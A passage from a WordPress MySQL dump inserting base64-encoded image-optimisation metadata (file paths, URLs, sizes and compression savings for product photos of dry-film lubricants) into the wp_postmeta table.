jQzODUsInRpbWUiOjE0ODM1NjY4NDIsImlkIjoxNjg0fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL2tyeXRveC12eWRheC1kcnlmaWxtLWx1YnJpY2FudC0yNTB4MjUwLmpwZyIsIndpZHRoIjoyNTAsImhlaWdodCI6MjUwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL2tyeXRveC12eWRheC1kcnlmaWxtLWx1YnJpY2FudC0yNTB4MjUwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL2tyeXRveC12eWRheC1kcnlmaWxtLWx1YnJpY2FudC0yNTB4MjUwLmpwZyIsInJlZHVjdGlvbiI6NDU4LCJ0aW1lIjoxNDgzNTY2ODQ1LCJpZCI6MTY4NH0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9rcnl0b3gtdnlkYXgtZHJ5ZmlsbS1sdWJyaWNhbnQtMjAweDIwMC5qcGciLCJ3aWR0aCI6MjAwLCJoZWlnaHQiOjIwMCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9rcnl0b3gtdnlkYXgtZHJ5ZmlsbS1sdWJyaWNhbnQtMjAweDIwMC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9rcnl0b3gtdnlkYXgtZHJ5ZmlsbS1sdWJyaWNhbnQtMjAweDIwMC5qcGciLCJyZWR1Y3Rpb24iOjQyNiwidGltZSI6MTQ4MzU2Njg0OCwiaWQiOjE2ODR9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwva3J5dG94LXZ5ZGF4LWRyeWZpbG0tbHVicmljYW50LTIyNXgyMjUuanBnIiwid2lkdGgiOjIyNSwiaGVpZ2h0IjoyMjUsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwva3J5dG94LXZ5ZGF4LWRyeWZpbG0tbHVicmljYW50LTIyNXgyMjUuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwva3J5dG94LXZ5ZGF4LWRyeWZpbG0tbHVicmljYW50LTIyNXgyMjUuanBnIiwicmVkdWN0aW9uIjo0NjIsInRpbWUiOjE0ODM1NjY4NTIsImlkIjoxNjg0fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL2tyeXRveC12eWRheC1kcnlmaWxtLWx1YnJpY2FudC01MTB4NjAwLmpwZyIsIndpZHRoIjo1MTAsImhlaWdodCI6NjAwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL2tyeXRveC12eWRheC1kcnlmaWxtLWx1YnJpY2FudC01MTB4NjAwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL2tyeXRveC12eWRheC1kcnlmaWxtLWx1YnJpY2FudC01MTB4NjAwLmpwZyIsInJlZHVjdGlvbiI6ODQ5LCJ0aW1lIjoxNDgzNTY2ODU1LCJpZCI6MTY4NH0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL2tyeXRveC12eWRheC1kcnlmaWxtLWx1YnJpY2FudC0xNjB4MTYwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL2tyeXRveC12eWRheC1kcnlmaWxtLWx1YnJpY2FudC0xNjB4MTYwLmpwZyIsIndpZHRoIjoiMTYwIiwiaGVpZ2h0IjoiMTYwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL2tyeXRveC12eWRheC1kcnlmaWxtLWx1YnJpY2FudC0xNjB4MTYwLmpwZyIsInJlZHVjdGlvbiI6NDU3LCJ0aW1lIjoxNDgzNTY2ODU5LCJpZCI6MTY4NH0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL2tyeXRveC12eWRheC1kcnlmaWxtLWx1YnJpY2FudC0yMjV4MzYwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL2tyeXRveC12eWRheC1kcnlmaWxtLWx1YnJpY2FudC0yMjV4MzYwLmpwZyIsIndpZHRoIjoiMjI1IiwiaGVpZ2h0IjoiMzYwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL2tyeXRveC12eWRheC1kcnlmaWxtLWx1YnJpY2FudC0yMjV4MzYwLmpwZyIsInJlZHVjdGlvbiI6NTA2LCJ0aW1lIjoxNDgzNTY2ODYyLCJpZCI6MTY4NH0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL2tyeXRveC12eWRheC1kcnlmaWxtLWx1YnJpY2FudC0zMDB4MzAwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL2tyeXRveC12eWRheC1kcnlmaWxtLWx1YnJpY2FudC0zMDB4MzAwLmpwZyIsIndpZHRoIjoiMzAwIiwiaGVpZ2h0IjoiMzAwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL2tyeXRveC12eWRheC1kcnlmaWxtLWx1YnJpY2FudC0zMDB4MzAwLmpwZyIsInJlZHVjdGlvbiI6NTQwLCJ0aW1lIjoxNDgzNTY2ODY2LCJpZCI6MTY4NH0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL2tyeXRveC12eWRheC1kcnlmaWxtLWx1YnJpY2FudC00NTB4Mjk5LmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL2tyeXRveC12eWRheC1kcnlmaWxtLWx1YnJpY2FudC00NTB4Mjk5LmpwZyIsIndpZHRoIjoiNDUwIiwiaGVpZ2h0IjoiMjk5IiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL2tyeXRveC12eWRheC1kcnlmaWxtLWx1YnJpY2FudC00NTB4Mjk5LmpwZyIsInJlZHVjdGlvbiI6NjAwLCJ0aW1lIjoxNDgzNTY2ODcwLCJpZCI6MTY4NH0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL2tyeXRveC12eWRheC1kcnlmaWxtLWx1YnJpY2FudC05MHg5MC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9rcnl0b3gtdnlkYXgtZHJ5ZmlsbS1sdWJyaWNhbnQtOTB4OTAuanBnIiwid2lkdGgiOiI5MCIsImhlaWdodCI6IjkwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL2tyeXRveC12eWRheC1kcnlmaWxtLWx1YnJpY2FudC05MHg5MC5qcGciLCJyZWR1Y3Rpb24iOjQxOCwidGltZSI6MTQ4MzU2Njg3MywiaWQiOjE2ODR9XQ=='); 
INSERT INTO `wp_postmeta` VALUES (29322, 1682, 'wpfc_optimisation_reduction', '13435'); 
INSERT INTO `wp_postmeta` VALUES (29323, 1682, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvbXMtMTIyeGQtZHJ5LWZpbG0tbHVicmljYW50LmpwZyIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvbXMtMTIyeGQtZHJ5LWZpbG0tbHVicmljYW50LmpwZyIsIndpZHRoIjo0NzUwLCJoZWlnaHQiOjMxNjIsIm1pbWVfdHlwZSI6IiIsImVycm9yX2NvZGUiOjksInRpbWUiOjE0ODM1NjY4NzgsImlkIjoiMTY4MiJ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvbXMtMTIyeGQtZHJ5LWZpbG0tbHVicmljYW50LTM0MHgzNDAuanBnIiwid2lkdGgiOjM0MCwiaGVpZ2h0IjozNDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvbXMtMTIyeGQtZHJ5LWZpbG0tbHVicmljYW50LTM0MHgzNDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvbXMtMTIyeGQtZHJ5LWZpbG0tbHVicmljYW50LTM0MHgzNDAuanBnIiwicmVkdWN0aW9uIjo2MDIsInRpbWUiOjE0ODM1NjY4ODEsImlkIjoxNjgyfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL21zLTEyMnhkLWRyeS1maWxtLWx1YnJpY2FudC04MDB4NTMzLmpwZyIsIndpZHRoIjo4MDAsImhlaWdodCI6NTMzLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL21zLTEyMnhkLWRyeS1maWxtLWx1YnJpY2FudC04MDB4NTMzLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL21zLTEyMnhkLWRyeS1maWxtLWx1YnJpY2FudC04MDB4NTMzLmpwZyIsInJlZHVjdGlvbiI6MTIxMywidGltZSI6MTQ4MzU2Njg4NSwiaWQiOjE2ODJ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvbXMtMTIyeGQtZHJ5LWZpbG0tbHVicmljYW50LTc2OHg1MTEuanBnIiwid2lkdGgiOjc2OCwiaGVpZ2h0Ijo1MTEsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvbXMtMTIyeGQtZHJ5LWZpbG0tbHVicmljYW50LTc2OHg1MTEuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvbXMtMTIyeGQtZHJ5LWZpbG0tbHVicmljYW50LTc2OHg1MTEuanBnIiwicmVkdWN0aW9uIjoxMTQ1LCJ0aW1lIjoxNDgzNTY2ODg5LCJpZCI6MTY4Mn0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9tcy0xMjJ4ZC1kcnktZmlsbS1sdWJyaWNhbnQtMTYwMHgxMDY1LmpwZyIsIndpZHRoIjoxNjAwLCJoZWlnaHQiOjEwNjUsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvbXMtMTIyeGQtZHJ5LWZpbG0tbHVicmljYW50LTE2MDB4MTA2NS5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9tcy0xMjJ4ZC1kcnktZmlsbS1sdWJyaWNhbnQtMTYwMHgxMDY1LmpwZyIsInJlZHVjdGlvbiI6NTQwNSwidGltZSI6MTQ4MzU2Njg5NCwiaWQiOjE2ODJ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvbXMtMTIyeGQtZHJ5LWZpbG0tbHVicmljYW50LTI1MHgyNTAuanBnIiwid2lkdGgiOjI1MCwiaGVpZ2h0IjoyNTAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvbXMtMTIyeGQtZHJ5LWZpbG0tbHVicmljYW50LTI1MHgyNTAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvbXMtMTIyeGQtZHJ5LWZpbG0tbHVicmljYW50LTI1MHgyNTAuanBnIiwicmVkdWN0aW9uIjo0OTgsInRpbWUiOjE0ODM1NjY4OTcsImlkIjoxNjgyfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL21zLTEyMnhkLWRyeS1maWxtLWx1YnJpY2FudC0yMDB4MjAwLmpwZyIsIndpZHRoIjoyMDAsImhlaWdodCI6MjAwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL21zLTEyMnhkLWRyeS1maWxtLWx1YnJpY2FudC0yMDB4MjAwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL21zLTEyMnhkLWRyeS1maWxtLWx1YnJpY2FudC0yMDB4MjAwLmpwZyIsInJlZHVjdGlvbiI6NDU0LCJ0aW1lIjoxNDgzNTY2OTAwLCJpZCI6MTY4Mn0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9tcy0xMjJ4ZC1kcnktZmlsbS1sdWJyaWNhbnQtMjI1eDIyNS5qcGciLCJ3aWR0aCI6MjI1LCJoZWlnaHQiOjIyNSwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9tcy0xMjJ4ZC1kcnktZmlsbS1sdWJyaWNhbnQtMjI1eDIyNS5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9tcy0xMjJ4ZC1kcnktZmlsbS1sdWJyaWNhbnQtMjI1eDIyNS5qcGciLCJyZWR1Y3Rpb24iOjQ1NywidGltZSI6MTQ4MzU2NjkwNywiaWQiOjE2ODJ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvbXMtMTIyeGQtZHJ5LWZpbG0tbHVicmljYW50LTUxMHg2MDAuanBnIiwid2lkdGgiOjUxMCwiaGVpZ2h0Ijo2MDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvbXMtMTIyeGQtZHJ5LWZpbG0tbHVicmljYW50LTUxMHg2MDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvbXMtMTIyeGQtZHJ5LWZpbG0tbHVicmljYW50LTUxMHg2MDAuanBnIiwicmVkdWN0aW9uIjo5ODIsInRpbWUiOjE0ODM1NjY5MTEsImlkIjoxNjgyfSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvbXMtMTIyeGQtZHJ5LWZpbG0tbHVicmljYW50LTE2MHgxNjAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvbXMtMTIyeGQtZHJ5LWZpbG0tbHVicmljYW50LTE2MHgxNjAuanBnIiwid2lkdGgiOiIxNjAiLCJoZWlnaHQiOiIxNjAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvbXMtMTIyeGQtZHJ5LWZpbG0tbHVicmljYW50LTE2MHgxNjAuanBnIiwicmVkdWN0aW9uIjo0NTgsInRpbWUiOjE0ODM1NjY5MTQsImlkIjoxNjgyfSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvbXMtMTIyeGQtZHJ5LWZpbG0tbHVicmljYW50LTIyNXgzNjAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvbXMtMTIyeGQtZHJ5LWZpbG0tbHVicmljYW50LTIyNXgzNjAuanBnIiwid2lkdGgiOiIyMjUiLCJoZWlnaHQiOiIzNjAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvbXMtMTIyeGQtZHJ5LWZpbG0tbHVicmljYW50LTIyNXgzNjAuanBnIiwicmVkdWN0aW9uIjo1NjYsInRpbWUiOjE0ODM1NjY5MTcsImlkIjoxNjgyfSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvbXMtMTIyeGQtZHJ5LWZpbG0tbHVicmljYW50LTMwMHgzMDAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvbXMtMTIyeGQtZHJ5LWZpbG0tbHVicmljYW50LTMwMHgzMDAuanBnIiwid2lkdGgiOiIzMDAiLCJoZWlnaHQiOiIzMDAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvbXMtMTIyeGQtZHJ5LWZpbG0tbHVicmljYW50LTMwMHgzMDAuanBnIiwicmVkdWN0aW9uIjo1ODgsInRpbWUiOjE0ODM1NjY5MjEsImlkIjoxNjgyfSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvbXMtMTIyeGQtZHJ5LWZpbG0tbHVicmljYW50LTQ1MHgzMDAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvbXMtMTIyeGQtZHJ5LWZpbG0tbHVicmljYW50LTQ1MHgzMDAuanBnIiwid2lkdGgiOiI0NTAiLCJoZWlnaHQiOiIzMDAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvbXMtMTIyeGQtZHJ5LWZpbG0tbHVicmljYW50LTQ1MHgzMDAuanBnIiwicmVkdWN0aW9uIjo2MzQsInRpbWUiOjE0ODM1NjY5MjUsImlkIjoxNjgyfSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvbXMtMTIyeGQtZHJ5LWZpbG0tbHVicmljYW50LTkweDkwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL21zLTEyMnhkLWRyeS1maWxtLWx1YnJpY2FudC05MHg5MC5qcGciLCJ3aWR0aCI6IjkwIiwiaGVpZ2h0IjoiOTAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvbXMtMTIyeGQtZHJ5LWZpbG0tbHVicmljYW50LTkweDkwLmpwZyIsInJlZHVjdGlvbiI6NDMzLCJ0aW1lIjoxNDgzNTY2OTI4LCJpZCI6MTY4Mn1d'); 
INSERT INTO `wp_postmeta` VALUES (29324, 1680, 'wpfc_optimisation_reduction', '9238'); 
INSERT INTO `wp_postmeta` VALUES (29325, 1680, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvbXMtMTIyYWRsLWRyeS1maWxtLWx1YnJpY2FudC5qcGciLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL21zLTEyMmFkbC1kcnktZmlsbS1sdWJyaWNhbnQuanBnIiwid2lkdGgiOjUxODQsImhlaWdodCI6MzQ1NiwibWltZV90eXBlIjoiIiwiZXJyb3JfY29kZSI6OSwidGltZSI6MTQ4MzU2NjkzMywiaWQiOiIxNjgwIn0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9tcy0xMjJhZGwtZHJ5LWZpbG0tbHVicmljYW50LTM0MHgzNDAuanBnIiwid2lkdGgiOjM0MCwiaGVpZ2h0IjozNDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvbXMtMTIyYWRsLWRyeS1maWxtLWx1YnJpY2FudC0zNDB4MzQwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL21zLTEyMmFkbC1kcnktZmlsbS1sdWJyaWNhbnQtMzQweDM0MC5qcGciLCJyZWR1Y3Rpb24iOjU1MywidGltZSI6MTQ4MzU2NjkzNiwiaWQiOjE2ODB9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvbXMtMTIyYWRsLWRyeS1maWxtLWx1YnJpY2FudC04MDB4NTMzLmpwZyIsIndpZHRoIjo4MDAsImhlaWdodCI6NTMzLCJ1cmwiOiJodHRwczpcL1